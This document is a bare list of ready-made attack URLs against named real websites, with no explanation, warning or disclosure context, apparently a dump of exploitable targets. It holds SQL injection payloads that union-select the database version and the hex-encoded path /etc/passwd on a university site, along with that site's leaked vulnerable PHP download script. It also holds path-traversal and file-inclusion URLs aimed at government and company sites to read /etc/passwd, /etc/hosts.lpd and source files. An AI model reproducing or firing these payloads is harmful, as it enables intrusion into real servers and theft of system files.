http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+version()--
http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+0x2f6574632f706173737764--
error_reporting(0); mysql_connect("localhost","*","*"); mysql_select_db( "owls08" ); error_reporting(1); $id = mysql_real_escape_string( $_REQUEST['id'] ); $query="SELECT file from presentations where id=$id"; $result = mysql_query( $query ) or die( mysql_error() ); $row = mysql_fetch_array( $result ); $file = $row['file']; header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Content-Type: application/force-download"); header( "Content-Disposition: attachment; filename=".basename($file)); header("Content-Transfer-Encoding: binary"); header("Content-Length: ".filesize($file)); header( "Content-Description: File Transfer"); @readfile($file);
http://www.duma.gov.ru/index.jsp?t=./index.jsp
http://www.summerschoolalpbach.at/index.php?file=index.php
http://www.b2match.com/watervienna09/index.php?file=index.php
http://www.autoday2009.sk/index.php?file=../../../../../../../../../../../etc/passwd
http://www.druekerco.com/index.php?folder=Career&page=../../../../../../etc/hosts.lpd